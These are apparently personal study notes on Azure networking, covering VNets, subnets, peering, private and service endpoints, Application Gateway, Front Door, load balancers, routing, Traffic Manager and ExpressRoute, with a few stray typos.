  • VM instances can be automatically deployed across multiple fault domains and update domains
  • VM instances can be automatically deployed across multiple regions
  • VM instances can be automatically deployed across multiple availability zones

Use Cases

  • Web front ends
  • API services
  • Batch processing
  • Containers
  • Microservices

Components

  • Scale Set: The group of identical VM instances
  • Load Balancer: Distributes traffic to the VM instances
  • Health Probe: Monitors the health of the VM instances
  • Scale Out: Increases the number of VM instances
  • Scale In: Decreases the number of VM instances
  • Auto Scale: Automatically scales the number of VM instances based on demand or a defined schedule
  • Auto Heal: Automatically heals unhealthy VM instances
  • Auto Update: Automatically updates the OS image of the VM instances
  • Fault Domain: A group of VM instances that share a common power source and network switch
  • Update Domain: A group of VM instances that are updated together

Pricing

  • Pay only for the VM instances that are running
  • No additional charge for the scale set service
  • No additional charge for the load balancer service
  • No additional charge for the health probe service

Scaling

  • Manual Scaling: Increase or decrease the number of VM instances manually
  • Auto Scaling: Automatically increase or decrease the number of VM instances based on demand or a defined schedule

Azure Virtual Network (VNet)

TOC

Introduction

Definition:

  • Azure Virtual Network (VNet) is a fundamental component of Microsoft Azure, allowing you to create private networks within the Azure cloud. These networks can be isolated or connected to on-premises data centers, providing a flexible and secure environment for deploying and managing resources. Azure Virtual Network provides the flexibility, security, and scalability needed to build robust cloud-based network infrastructures, supporting a wide range of applications and services.

Key Features:

  1. Isolation and Segmentation:

    • Create isolated networks for your resources.
    • Use subnets to segment the VNet into smaller address spaces for organization and security.
  2. Security:

    • Implement Network Security Groups (NSGs) to control inbound and outbound traffic.
    • Use Azure Firewall for advanced network security.
  3. Connectivity:

    • Connect VNets to each other using VNet peering.
    • Link your VNet to on-premises networks using VPN Gateway or ExpressRoute.
    • Enable secure connections to the internet or other Azure services.
  4. Scalability and Availability:

    • Scale your network by adding or resizing subnets.
    • Ensure high availability with Azure’s global infrastructure.
  5. Integration with Azure Services:

    • Seamlessly integrate with Azure services like Azure Kubernetes Service (AKS), Azure App Service, and Azure Storage.
    • Use service endpoints to secure your Azure services within your VNet.
  6. DNS and Customization:

    • Customize DNS settings for your VNet.
    • Use Azure-provided DNS or bring your own DNS servers.
  7. Monitoring and Troubleshooting:

    • Monitor network performance and security with Azure Monitor and Network Watcher.
    • Diagnose and troubleshoot network issues efficiently.

Use Cases:

  • Deploying multi-tier applications with web, application, and database layers.
  • Extending on-premises networks to the cloud.
  • Isolating development, testing, and production environments.
  • Ensuring secure access to Azure services.
  • In addition to virtual machines, we can deploy more than 32 other services in a VNet.
  • Native internal TCP/UDP load balancing and proxy systems for internal HTTP/s load balancing.
  • Connect to on-premises networks to form hybrid network architectures.

Difference’s between vNet and On-premises network:

  • Azure vNets do not support layer 2 semantics (only layer-3 and layer-4). This means that concepts such as vLANs and layer-2 broadcast/multicast are not supported. Running arp -a on a VM in Azure will show that MAC address resolution for VMs in the same subnet results in th esame 12:34:56:78:9a:bc value. This is because we are on a shared platoform and the vNet is a layer-3 construct.

  • Some protocols and communication types are restricted from being used in Azure vNets. Protocols such as multicast, broadcast, DHCP Unicast, UDP source port 65330, IP-in-IP encapsulated packets, and GRE are not supported.

vNet Naming

  • You can have two vNets in an Azure subscription with the same name as long as they are in different resource groups.

Address Spaces

  • When creating a VNet, you must specify an address space. This address space is a range of IP addresses that can be used by the resources in the VNet.
  • The address space can be either IPv4 or IPv6. However, a vNet cannot be IPv6 only.
  • You can create multiple address spaces in a vNet.
  • Though, you can use any address space, it is recommended to use a private address space as defined in RFC 1918. (10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16)
  • You cannot peer vNets with overlapping address spaces.

Peering

  • vNET peering allows us to transfer data between vNETs within and across Azure Subscriptions.
  • Connect VNETs together using the Azure backbone network so that resources within the subnets can ‘talk’ to each other
  • VNETs with overlapping address spaces cannot be peered
  • vNET peering is easy to implement, no additional infrastructure is required. Peering can be setup between vNETs within minutes.
  • To implement the peering connection, the Network Contributor role or a custom role with the following permissions is required for both the source and destination vNETs:
    • Microsoft.Network/virtualNetworks/peer/action
    • Microsoft.Network/virtualNetworks/virtualNetworkPeerings/write
    • Microsoft.Network/virtualNetworks/virtualNetworkPeerings/read
  • vNET peering is not transitive. If vNET A is peered with vNET B and vNET B is peered with vNET C, vNET A and vNET C are not peered.

Connection vNETs using a VPN Gateway

  • In addition to peering, another option for connecting vNETs is to use a VPN Gateway connection.
  • This option uses an Azure VPN Gateway to create a secure IPSec/IKE tunnel to the target network.
  • Unlike peering, traffic is routed over the public internet and not the Azure backbone network.
  • Deploying the VPN Gateway takes around 40 minutes.
  • When implementing the VPN Gateway to connect two vNETs, there are two connection types that we can use:
    • vNET-to-vNET: Connects two vNETs in the same Azure Subscription.
    • Site-to-Site: Connects two vNETs in different Azure Subscriptions
  • You can use this option to connect vNETs with overlapping address spaces by configuring NAT rules on the VPN Gateway

vWAN Hub

vWAN Notes

Comparing vNET Peering vs. VPN Gateway vs. vWAN Hub

FeaturePeeringVNET GatewayvWAN Hub
DefinitionDirect connection between VNetsConnection using a VPN gatewayConnection via Virtual WAN Hub
Use CaseLow latency, high-speed connection within the same regionSecure cross-region or hybrid connectivityScalable, centralized management of large-scale network architecture
BandwidthUp to 10 GbpsDependent on gateway SKUUp to 20 Gbps (depending on the hub scale)
LatencyLowHigher due to encryptionVariable, generally higher than peering
EncryptionNot supportedSupportedSupported
RoutingManual configurationSupports BGP, more complex routingSimplified with centralized control
CostLower, based on data transferHigher, based on gateway and data transferVariable, based on hub and data transfer
ScalabilityLimited to same regionCross-region, but limited by gateway scaleHighly scalable for global networks
SecurityLess secure, no encryptionMore secure with encryptionHigh security with built-in features
ComplexitySimple to configureModerate complexityHigh complexity, but with centralized management tools
Cross-SubscriptionSupportedSupportedSupported
Cross-TenantNot supportedNot supportedSupported
RedundancyDepends on setupHigh availability supportedHigh availability and redundancy supported
Additional FeaturesSupports private endpoints and service chainingSupports VPN, ExpressRouteIntegrated with Azure Firewall, Application Gateway, etc.

Azure Subnets

Definition

Azure subnets are subdivisions of an Azure Virtual Network (VNet). They help organize and secure your Azure resources by segmenting the VNet into smaller, manageable sections.

Key Features

  1. IP Address Range:

    • Each subnet must have a unique IP address range within the VNet.
    • The address range is defined in CIDR notation (e.g., 10.0.0.0/24).
  2. Network Security:

    • Use Network Security Groups (NSGs) to control inbound and outbound traffic at the subnet level.
    • NSGs can be associated with one or more subnets, defining security rules for the subnet.
  3. Routing:

    • Subnets can have custom route tables associated with them.
    • Custom routes can direct traffic to specific network appliances or on-premises networks.
  4. Service Endpoints:

    • Enable service endpoints to secure Azure service resources (like Azure Storage or Azure SQL Database) to your VNet.
    • Traffic to these services can remain within the Azure backbone network.
  5. Integration with Azure Services:

    • Subnets can host various Azure resources, such as Virtual Machines (VMs), Azure Kubernetes Service (AKS), and App Service Environments (ASE).
    • Subnets can be part of an Azure Availability Zone, enhancing resilience and availability.
    • A full list of services that support vNet integration can be found here: Azure Services that support vNet Integration
  6. Subnet Delegation:

    • Delegate a subnet to specific Azure services to simplify network configuration and management.
    • Examples of delegatable services include Azure Container Instances and Azure App Service.
  7. Subnet Peering:

    • Use VNet peering to connect subnets across different VNets, allowing resources to communicate securely.
    • Peered VNets can be within the same region or across different Azure regions (Global VNet Peering).

Best Practices

  1. Designing Subnets:

    • Plan subnets based on application tiers (e.g., web, application, database) to improve security and manageability.
    • Ensure enough IP addresses in each subnet to accommodate future growth.
  2. Security:

    • Apply NSGs at both the subnet and network interface level for layered security.
    • Regularly review and update NSG rules to maintain optimal security.
  3. Monitoring and Management:

    • Use Azure Monitor and Network Watcher to monitor subnet performance and diagnose network issues.
    • Implement logging for NSGs to track and analyze network traffic.
  4. IP Address Management:

    • Avoid overlapping IP address ranges when peering VNets.
    • Use private IP ranges for subnets to ensure secure and efficient routing within Azure.

Use Cases

  • Isolating Resources: Segregate different types of workloads or environments (development, testing, production) within a VNet using NSGs.
  • Enhanced Security: Apply NSGs to subnets for controlling traffic flow and securing resources.
  • Network Organization: Organize resources logically within a VNet for better management and scalability.
  • Service Integration: Securely connect Azure services to your VNet using service endpoints or private link.

Facts

  • A vNet can have up to 3000 subnets
  • Azure reserves 5 IP addreses within each subnet for system use. These addresses cannot be used. The first four and the last IP address cannot be allocated to a resource.
    • The first IP address is the network address.
    • The last IP address is the broadcast address.
    • The next three IP addresses are reserved for Azure services. (Default Gateway and 2 DNS Servers)
  • If you need to modify the address space of a subnet that already has resources in it, you must first remove all resources from the subnet.

Azure subnets are essential for structuring your VNet, ensuring security, and managing resources efficiently within your Azure environment.

Design-and-implement-private-access

Directory Map

Private Link

A Private Link in Azure is a network interface that connects you privately and securely to a service powered by Azure Private Link. Here are the key points about private endpoints:

  • Private Link/private endpoints offer an advantage over the service endpoint option. On-premises networks can access platform services privately over a ExpressRoute or VPN connection through the private endpoint. Service endpoints do not offer this capability.
  • If we have implemented a virtual WAN architecture, private endpoints can only be deployed on spoke virtual networks connected to the virtual hub. Implementing private endpoints directly on the virtual hub is not supported.
  • Supported Azure services can be accessed over private endpoints, but you need to register those private endpoint records in a corresponding private DNS zone.

Azure Service Endpoint

Overview

Azure Service Endpoint is a feature that provides direct connectivity from a virtual network to Azure services. It extends the identity of your virtual network to the Azure services over a direct connection. The traffic to the Azure service always remains on the Microsoft Azure backbone network. Service Endpoints are not supported across different AD tenants for most services, except for Azure Storage and Azure Key Vault.

Service Endpoint Policy

Service Endpoint Policies allow us to control the Azure Service that will be reachable via a Service Endpoint. They provide an additional layer of security to ensure that a service endpoint cannot be used to access all instances of a resource type. For example, if we have a Microsoft.Storage service endpoint on a subnet, we can create a Service Endpoint Policy to allow access to only a specific storage account. Without the policy, the service endpoint can be used to access all storage accounts in the region.

  • Currently, only the Microsoft.Storage provider is compatible with Service Endpoint Policies.
  • We can scope access to one of three options:
    • All storage accounts in the subscription
    • All storage accounts in a specific resource group
    • A specific storage account

Example Usage

  1. Create a Service Endpoint Policy
  2. Associate the Service Endpoint Policy with a subnet

Service Endpoint Policy

Design-and-implement-routing

Directory Map

Application Gateway

Overview

  • An Azure Application Gateway is a regional web traffic load balancer that enables you to manage traffic to your web applications. It provides various layer 7 load balancing capabilities for your applications, including SSL termination, cookie-based session affinity, URL-based routing, and multi-site routing. Here are the key features and benefits of Azure Application Gateway:
  • Layer 7 Load Balancing: Application Gateway operates at the application layer (layer 7) of the OSI model, allowing you to route traffic based on URL paths or hostnames.
  • SSL Termination: Application Gateway can terminate SSL connections, offloading the SSL decryption/encryption process from your web servers.
  • Cookie-Based Session Affinity: Application Gateway supports cookie-based session affinity, ensuring that client requests are directed to the same backend server for the duration of a session.
  • URL-Based Routing: You can configure Application Gateway to route traffic based on URL paths, enabling you to direct requests to different backend pools based on the URL.
  • Multi-Site Routing: Application Gateway supports routing traffic to multiple websites hosted on the same set of backend servers, allowing you to host multiple sites on a single set of servers.
  • Web Application Firewall (WAF): Application Gateway includes a Web Application Firewall (WAF) that provides protection against common web vulnerabilities and attacks, such as SQL injection and cross-site scripting.

Use Cases

  • Web Application Load Balancing: Application Gateway is commonly used to distribute traffic across multiple web servers hosting web applications.
  • SSL Offloading: By terminating SSL connections at the gateway, Application Gateway can reduce the load on backend servers and improve performance.
  • Session Affinity: Cookie-based session affinity ensures that client requests are consistently directed to the same backend server, maintaining session state.
  • URL-Based Routing: Application Gateway can route traffic based on URL paths, enabling you to direct requests to specific backend pools based on the U.

Components

  • Frontend IP Configuration: Defines the public IP address and port used to access the Application Gateway.

  • Backend Target:

    • Backend Pool: Contains the backend servers that receive the traffic from the Application Gateway. Consists of Azure VMs, VMSS’ Azure Web Apps, or one-premises servers.
    • Redirection: Redirects traffic to a external site or a listener.
      • An external site refers to an endpoint outside of the application gateway. -
  • HTTP Settings: Define how the Application Gateway communicates with the backend servers, including port, protocol, and cookie settings.

  • HTTP Listener: Listens for incoming HTTP/HTTPS traffic and routes it to the appropriate backend pool based on the URL path or hostname.

  • URL Path-Based Routing Rules: Define rules that route traffic to different backend pools based on the URL path.

Deployment

  • Application Gateway must be deployed into an empty subnet within a virtual network.
  • You can create an Application Gateway using the Azure portal, Azure PowerShell, Azure CLI, or ARM templates.

Tiers

  • Standard: Offers additional features such as autoscaling, SSL offloading
    • The standard tier offers 3 size options: Small, Medium, and Large
  • WAF: Provides protection against common web vulnerabilities and attacks.
    • The WAF tier offers 2 size options: Medium and Large

WAF

  • The Web Application Firewall (WAF) feature of Application Gateway provides centralized protection for your web applications from common web-based attacks.
  • WAF uses OWASP (Open Web Application Security Project) rules to protect against threats such as SQL injection, cross-site scripting, and remote file inclusion.
  • You can customize WAF rules to meet the specific security requirements of your web applications.
  • WAF logs provide detailed information about web application attacks and security events, helping you monitor and respond to potential threats.
  • There are two tiers of WAF available: WAF v1 and WAF v2. WAF v2 offers enhanced security features and performance improvements over WAF v1.

Backend Targets

  • Two types of backend targets can be configured:
    • backend pools
      • a collection of IP addresses or FQDNs, VM instances or VMSS
      • You can configure up to 100 backend address pools and 1200 targets per pool
    • redirection
      • Redirections are used to redirect incoming traffic from the application gateway to an external site or listener

Azure Availability Sets

Azure Availability Sets are a feature in Microsoft Azure that ensures high availability for your virtual machines (VMs). They provide redundancy and improve the reliability of applications and services by distributing VMs across multiple isolated hardware nodes within a data center. Here are the key points about Azure Availability Sets:

  1. Fault Domains: VMs within an availability set are spread across multiple fault domains, which are groups of hardware that share a common power source and network switch. This distribution helps to protect your application from hardware failures.

  2. Update Domains: VMs are also spread across multiple update domains, which are groups of hardware that can be updated and rebooted simultaneously. This minimizes the impact of maintenance operations, ensuring that not all VMs are down during updates.

  3. Redundancy and Resilience: By spreading VMs across different fault and update domains, availability sets ensure that at least some instances of your application remain running during hardware failures or maintenance events.

  4. Service Level Agreement (SLA): Using availability sets can help you achieve a higher SLA for your application. Azure provides a 99.95% SLA for VMs that are part of an availability set.

  5. Scalability: Availability sets allow you to scale your application horizontally by adding more VMs, which are automatically distributed across fault and update domains.

  6. Configuration: When creating an availability set, you can specify the number of fault and update domains. Azure will then manage the distribution of your VMs accordingly.

By using Azure Availability Sets, you can enhance the availability and reliability of your applications and services.

Azure Availability Zones

Azure Availability Zones are a high-availability offering that protects applications and data from data center failures. They are physically separate locations within an Azure region, each with independent power, cooling, and networking. Here are the key points about Azure Availability Zones:

  1. Physical Separation: Availability Zones are isolated from each other, ensuring that a failure in one zone does not affect the others. This physical separation enhances fault tolerance and disaster recovery.

  2. Redundancy and Reliability: Applications and data are replicated across zones, providing redundancy and higher reliability. This helps to ensure that services remain available even if one zone experiences an outage.

  3. Service Level Agreement (SLA): Azure offers a 99.99% SLA for virtual machines running in availability zones, which is higher than the SLA for availability sets.

  4. Data Residency: Availability Zones ensure that your data remains within the same Azure region, complying with data residency and compliance requirements.

  5. Automatic Replication: Services such as virtual machines, managed disks, and databases can be automatically replicated across zones to ensure high availability.

  6. Scalability: Availability Zones support scaling out applications by deploying resources across multiple zones, thereby improving performance and availability.

  7. Disaster Recovery: By using availability zones, you can implement robust disaster recovery solutions, minimizing downtime and data loss during catastrophic events.

By leveraging Azure Availability Zones, you can significantly enhance the availability, reliability, and resilience of your applications and services.

Azure Front Door

  • Azure Front Door is a global, scalable entry-point that uses the Microsoft global edge network to create fast, secure, and widely scalable web applications.
  • Azure Front Door provides a range of features, including global load balancing, WAF capabilities, and statis and dynamic content caching (CDN) capabilities.
  • By default, Azure Front Door will route requests to the endpoint with the lowest latency using one of it’s 150 global points of presence.

Overview

  • Global Load Balancing: Azure Front Door provides global load balancing to ensure that users are directed to the closest and healthiest endpoint.
  • Web Application Firewall (WAF): Azure Front Door includes a Web Application Firewall (WAF) that provides protection against common web vulnerabilities and attacks.
  • SSL Offloading: Azure Front Door can terminate SSL connections, offloading the SSL decryption/encryption process from your web servers.
  • Session Affinity: Azure Front Door supports session affinity, ensuring that client requests are directed to the same backend server for the duration of a session.
  • URL-Based Routing: You can configure Azure Front Door to route traffic based on URL paths, enabling you to direct requests to different backend pools based on the URL.
  • Custom Domains: Azure Front Door supports custom domains, allowing you to use your own domain name for the service.
  • Scalability: Azure Front Door is designed to scale automatically based on demand, ensuring that your application can handle increased traffic.
  • Monitoring and Analytics: Azure Front Door provides detailed monitoring and analytics to help you track the performance and health of your web applications.
  • High Availability: Azure Front Door is built on a highly available and resilient infrastructure, ensuring that your applications remain accessible even in the event of failures.
  • Integration with Azure Services: Azure Front Door can be integrated with other Azure services, such as Azure CDN and Azure Application Gateway, to provide additional functionality and capabilities.

CDN

  • Azure Front Door can serve as a content delivery network (CDN) by caching content at edge locations to reduce latency and improve performance.

Components

  • An instance of the Front Door service is referred to as the Front Door Profile. We can create up to 500 Standard or Premium Front Door Profiles per subscription.
  • To perform it’s functions, Azure Front Door relies on 3 components:
    • Endpoints: Receives incoming traffic
      • 10 endpoints can be created for a Standard Tier Front Door Profile.
      • 25 Endpoints can be created for a Premium Tier Profile.
      • When you create an endpoint, a default domain name is created for you. You can choose to create a custom domain as well. Standard Tier supports up to 100 custom domains, while Premium Tier supports up to 500 custom domains.
        • When adding a custom domain, HTTPS is enforced and we need to specify the SSL/TLS certificate to use. Two options are available for this:
          • Azure Managed Certificate: Azure Front Door will automatically create and manage the certificate for you. Not available for Wildcard domains. Only available for apex domains and subdomains.
          • Bring Your Own Certificate (BYOC): You can upload your own certificate.
          • Renewal for apex domain certificates requires domain revalidation.
    • Origin Groups: Like a backend pool, where requests are distributed to.
      • Front Door supports both Azure and non-Azure endpoints.
    • Routes: Map Endpoints to Origin Groups
      • We can add up to 100 routes for a Standard Tier Front Door Profile and 200 routes for a Premium Tier Profile.

Rule Sets

  • To perform more granular processing or customizations beyond the capabilities of routes in Front Door, we can use rule sets. Rule sets are a set of rules that can be applied to incoming traffic to Front Door. The allow for granular customization of how requests are handled at the Front Door edge and can even override the origin group for a given request. In a Standard tier resource, we can have a max of 100 rule sets, while in a premium tier resource we can have up to 200 rule sets.
  • Rule sets consists of if/then/else rules.

Service Tiers (SKU)

  • Azure Front Door is offered in 3 tiers:

    • Classic: The original service tier for front door. Uses the Microsoft.Network provider and does not support many features. Microsoft no longer recommends using this tier. Microsoft offers a zero-downtime migration path to the Standard and Premium tiers.
    • Standard: Uses the Microsoft.Cdn provider.
    • Premium: Uses the Microsoft.Cdn provider.

Azure Load Balancer

Backend Pools

  • Backend pools contain resources for the load balancer to distribute traffic to
  • Resources can be VMs, VMSS, or IP addresses

Health Probes

  • You can configure Health Probes so that the load balancer only sends traffic to a healthy instance of the backend pool

SKUs

  • Standard

    • Charge per hour
    • The machines in the backend pool can be in an Availability Set, VMSS, or stand-alone VMs
    • Health Probes can be TCP, HTTP, or HTTPS
    • Supports Availability Zones
    • 99.99% SLA
    • Requires that the public IP address also be in the Standard SKU
    • Can be implemented as a public or internal load balancer
    • Supports a global deployment option, but you must choose a ‘home’ region. The backend pool will then have one or more regional load balancers. The frontend IP must be static and is advertised to other Azure regions via Anycast.;;;;
    • The standard load balancer has 3 availability zone configuration options: zonal, zone-redundant, and non-zonal.
      • a zonal configuration allows the load balancer to distribute requests to resources in a single zone
      • a non-zonal configuration is relatively uncommon and is generally used to distribute requests to workloads that have not been pinned to a specific zone.
      • a zone-redundant configuration allows the load balancer to distribute requests to resources in any zone the load balancer is deployed in.
  • Basic (Retiring soon)

    • Free
    • The machines in the backend pool need to be part of an availability set or VMSS
    • Health probes can be TCP or HTTP
    • No support for Availability Zones
    • No SLA
  • Gateway

    • Catered for high performance and HA scenarios with third party NVA’s (Network Virtual Appliances)

NAT

  • You can use NAT rules to translate a single public IP address into multiple backend resources with private IP addresses

Outbound Rules

Azure Load Balancer outbound rules define how outbound connections from your virtual machines (VMs) are handled. These rules determine the allocation and management of public IP addresses for outbound traffic from VMs within a virtual network. Here are the key points about Azure Load Balancer outbound rules:

  1. Outbound Connectivity: Outbound rules provide connectivity for VMs to the internet by assigning a public IP address to the outbound traffic, ensuring VMs can initiate connections to external resources.
  2. SNAT (Source Network Address Translation): Outbound rules use SNAT to translate private IP addresses of VMs to a public IP address for outbound traffic. This allows multiple VMs to share the same public IP for outbound connections.
  3. Public IP Allocation: You can associate a public IP address or a pool of public IP addresses with the load balancer to manage outbound connectivity. This provides control over the IP addresses used for outbound traffic.
  4. Port Management: Outbound rules manage the available ports for outbound connections. By default, Azure Load Balancer uses ephemeral ports for SNAT, but you can configure custom port ranges to optimize the use of available ports.
  5. Idle Timeout: Outbound rules include an idle timeout setting that defines the duration a connection can remain idle before being closed. This helps manage and free up unused connections.
  6. Scaling: Outbound rules support scaling scenarios where you can distribute outbound traffic across multiple public IP addresses to handle high traffic volumes and ensure availability.
  7. Configuration: Outbound rules can be configured in the Azure portal, through Azure PowerShell, or using Azure CLI. You can specify parameters such as the public IP address, port ranges, and idle timeout settings.
  8. Security: By controlling outbound traffic through outbound rules, you can enhance the security of your VMs by ensuring that only allowed outbound connections are established.

By configuring Azure Load Balancer outbound rules, you can effectively manage and optimize the outbound connectivity of your virtual machines, ensuring reliable and controlled access to external resources.

Internal Azure Load Balancer

An Internal Azure Load Balancer (ILB) is a load balancing service that distributes network traffic across virtual machines (VMs) within a virtual network (VNet) without exposing them to the internet. It is designed for private, internal applications and services. Here are the key points about an Internal Azure Load Balancer:

  1. Private IP Address: The ILB operates using a private IP address within your VNet, ensuring that traffic is only accessible internally and not exposed to the internet.
  2. Load Balancing Algorithms: ILB distributes incoming traffic across multiple VMs using various load balancing algorithms, such as round-robin and hash-based distribution, to optimize resource usage and performance.
  3. High Availability: By distributing traffic across multiple VMs, ILB enhances the availability and reliability of your internal applications and services, ensuring they remain accessible even if individual VMs fail.
  4. Health Probes: ILB uses health probes to monitor the status of VMs and ensure traffic is only directed to healthy instances. This helps maintain the stability and performance of your applications.
  5. Configuration Flexibility: You can configure ILB to balance traffic for different types of services, such as TCP, UDP, HTTP, and HTTPS, allowing for a wide range of internal application scenarios.
  6. Integration with Network Security: ILB can be integrated with Azure Network Security Groups (NSGs) and Azure Firewall;jjj to enhance the security of your internal network traffic.
  7. Scalability: ILB supports scaling out by adding more VMs to the backend pool, ensuring that your internal applications can handle increased traffic and load.
  8. Use Cases: Common use cases for ILB include load balancing for internal line-of-business applications, databases, private APIs, and microservices within a VNet.
  9. Configuration Management: ILB can be configured and managed using the Azure portal, Azure PowerShell, Azure CLI, and Azure Resource Manager (ARM) templates.

By using an Internal Azure Load Balancer, you can efficiently manage and distribute internal network traffic, ensuring high availability, performance, and security for your private applications and services.

Cross Region (Global) Load Balancer

  • Cross region load balancer is a global load balancer that can distribute traffic across multiple regions
  • You must still create a load balancer in each region
  • The global load balancer must be deployed in a ‘home region’
  • A global load balancer must be a public, Standard SKU load balancer
  • The global load balancer uses the geo-proximity load-balancing algorithm to determine the optimal routing path for network traffic. This algorithm directs requests to the nearest “participating” region based on the geographic location of the client creating the request.

Azure Virtual Network Routing

System Routes

  • Azure vNet system routes are automatically created and maintained by Azure to enable routing between subnets, on-premises networks, and the internet.
  • Azure vNet system routes are automatically associated via a default route table to the vNet.
  • System Routes are a collection of routing entries that define several destination networks and the next hop to send the traffic to. This is the path that the traffic should follow to get to the destination.

Modifying the default routing behavior

  • You can override the default system routes by creating User Defined Routes (UDRs) and associating them with subnets in your Azure Virtual Network (VNet) or by using BGP.

User Defined Routes (UDR)

  • You can have up to 200 custom route tables per region per subscription.
  • A subnet can be associated with only one route table at a time.
  • Azure User Defined Routes (UDR) allow you to control the routing of traffic leaving a subnet in an Azure Virtual Network (VNet).
  • UDRs are used to override Azure’s default system routes, which control traffic between subnets, on-premises networks, and the internet.
  • UDRs can be used to direct traffic to specific next hops, such as virtual appliances, network virtual appliances (NVAs), or virtual machines (VMs).
  • UDRs are associated with subnets within a VNet and are evaluated in priority order to determine the routing of outbound traffic.
  • UDRs can be created, modified, and deleted using the Azure portal, Azure PowerShell, Azure CLI, or Azure Resource Manager (ARM) templates.
  • UDRs are commonly used in scenarios where you need to route traffic through specific network devices, apply network security policies, or optimize traffic flow within your Azure environment.
  • UDRs can be used in conjunction with Azure Virtual Network Gateways, Azure ExpressRoute, Azure VPN Gateway, and other networking services to control the flow of traffic in and out of your Azure Virtual Network.

Traffic Manager

Traffic Manager is a DNS based traffic load balancing service

Overview

  • Traffic manager is a global service. You do not select a region when you deploy it.
  • Traffic Manager uses DNS to direct client requests to the most appropriate service endpoint based on a traffic-routing method and the health of the endpoints.
  • Traffic Manager can improve the availability and responsiveness of your application.
  • Traffic Manager can be used to:
    • Load balance incoming traffic across multiple Azure regions
    • Route traffic to a specific region based on the client’s geographic location
    • Route traffic to a specific region based on the endpoint’s health
    • Route traffic to a specific region based on the endpoint’s performance
  • Traffic Manager supports multiple DNS routing methods, including:
    • Priority
    • Weighted
    • Performance
    • Geographic
    • Multi-value
  • Traffic Manager can be used with Azure services, external services, and on-premises services. The endpoint must be public.
    • Traffic Manager does not support routing to private IP addresses.

Endpoint types:

  • Azure Endpoint:
    • Cloud Service, Web App, Public IP
  • External Endpoint
  • Nested TM Profile

Traffic Routing Methods

  • Priority Routing Method
    • Traffic Manager directs traffic to the primary endpoint. If the primary endpoint is unavailable, Traffic Manager fails over to the secondary endpoint.
  • Performance Routing Method
    • Traffic Manager directs traffic to the endpoint with the lowest latency.
  • Geographic Routing Method
    • Traffic Manager directs traffic to the endpoint based on the geographic location of the client (where the DNS query originates from).
  • Subnet Routing Method
    • Traffic Manager directs traffic to the endpoint based on the IP address of the client.
  • Weighted Routing Method
    • Traffic Manager distributes traffic across multiple endpoints based on a user-defined weight.
  • Multi-value Routing Method
    • Traffic Manager returns multiple endpoints in the DNS response, and the client selects one.

Design-implement-and-manage-hybrid-networking

Directory Map

Azure Express Route

Overview

  • Azure ExpressRoute lets you extend your on-premises networks into the Microsoft cloud over a private connection facilitated by a connectivity provider.
  • With ExpressRoute, you can establish connections to Microsoft cloud services, such as Microsoft Azure, Office 365, and Dynamics 365.
  • ExpressRoute connections do not go over the public Internet, and offer more reliability, faster speeds, lower latencies, and higher security than typical connections over the Internet.
  • ExpressRoute connections typically have redundant connectivity from the partner network into the Microsoft Edge

Benefits

  • Layer 3 connectivity between your on-premises network and the Microsoft Cloud through a connectivity provider.
  • Connectivity can be from an any-to-any (IPVPN) network, a point-to-point Ethernet network, or a virtual cross-connection through a connectivity provider at a co-location facility.
  • Connectivity to Microsoft cloud services across all regions in the geopolitical region.
  • Global connectivity to Microsoft services across all regions with the ExpressRoute premium add-on.
  • Built-in redundency in every peering location for high availability.

Private vs. Public Peering

Peering refers to the connection between two networks for traffic exchange.

  • Private peering allows remote networks to access Azure vNets and resources connected to those vNets, such as infrastructure and PaaS services.
  • Public peering allows remote networks to access Microsoft Cloud services such as Office 365 and Azure Platform services.

ExpressRoute Components

  • On-prem devices: Devices located physically within an organization’s premises

  • Customer Edge (CE) router: The on-premises router that connects to the service provider’s edge router.

  • Provider Edge (PE) devices CE Routers: These are devices used by providers to connect to the CE router.

  • Partner Edge devices facing Microsoft Edge routers: These are devices used by ExpressRoute service providers to connect to Microsoft Edge routers

  • Microsoft Edge Routers: These are redundant pairs of routers on the Microsoft side of the ExpressRoute connection.

  • ExpressRoue vNet Gateway: This service connects an ExpressRoute connection with an Azure vNet.

  • Azure vNet: A virtual network in Azure that can be connected to an ExpressRoute circuit.

    ExpressRoute Components

ExpressRoute Connectivity Models

When architecting an ExpressRoute connection, you can choose from two different connectivity models:

  • Provider Model: The provider model connects a remote network to Azure using a third-party provider. To establish this connection, we need to work with the provider to set up the connection. Depending on the service offering the ExpressRoute partner provides, we have up to 3 connectivity options that we can implement:

    • Cloud Exchange co-location

      • This involves moving our infrastructure into a data center where the ExpressRoute partner has a presence. We can then order virtual cross-connections to the Microsoft network. The cross-connect could be a layer 2 or layer 3 connection.
    • Point-to-point Ethernet connection

      • This involves working with an ISP that provides single-site layer 2 or layer 3 connectivity between the remote network and the Azure vNet. The key point with this option is that connectivity is for a single customer site.
    • Any-to-Any IPVPN connection

      • This option leverages ISP-provided MPLS connectivity to connect multiple customer sites with the Microsoft cloud network. This model is recommended for customers with existing MPLS connections.
  • ExpressRoute Direct Model:

    • This model allows a customer’s network to connect directly to Microsoft at peering locations strategically placed around the world, with a 10 Gbps or dual 100 Gbps connection.

    • This model supports active/active connectivity at scale

    • This model does not rely on a third party for ExpressRoute connectivity.

    • This model is good when very high bandwidth is required.

Route Advertisement

  • When Microsoft peering gets configured on your ExpressRoute circuit, the Microsoft Edge routers establish a pair of BGP sessions with your edge routers through your connectivity provider. No routes are advertised to your network by default. To enable router advertisements, you must associate a route filter.

ExpressRoute Circuit SKUs

  • ExpressRoute circuits are offered in three SKUs:

    • Local
      • Can be used to provide connectivity to vNets in one or two Azure regions in the same metro/geographical area.
      • Not all ExpressRoute locations support the ‘Local’ SKU
      • One benefit of the local SKU is there is no additional cost for transferring data out of Azure through the ExpressRoute connection (egress data).
    • Standard
      • Can provide connectivity to vNets and Azure services in Azure regions in a geopolitical area. For example, all regions in North America.
      • Egress data transfer is an added cost.
      • There are two billing models for egress data. Metered and Unlimited.
        • Metered requires that you estimate how much egress data you will use, and you only pay for that amount.
        • Unlimited allows you to use any amount of data but has a fixed monthly fee.
    • Premium
      • Can provide connectivity to vNets globally.
      • There are two billing models for egress data. Metered and Unlimited.
        • Metered requires that you estimate how much egress data you will use, and you only pay for that amount.
        • Unlimited allows you to use any amount of data but has a fixed monthly fee.
      • The premium SKU is required if you plan to use Microsoft peering to access Microsoft SaaS/PaaS services over the ExpressRoute connection.
  • ExpressRoute circuits are offered in three SKUs: Local, Standard and Premium. (Two shown below)

    FeatureExpressRoute StandardExpressRoute Premium
    Global ReachNoYes
    Increased Route LimitsNoYes
    Connectivity to Microsoft PeeringLimited to the same geopolitical regionGlobal connectivity
    Service ProvidersLimitedExpanded
    Route Advertisements4,00010,000
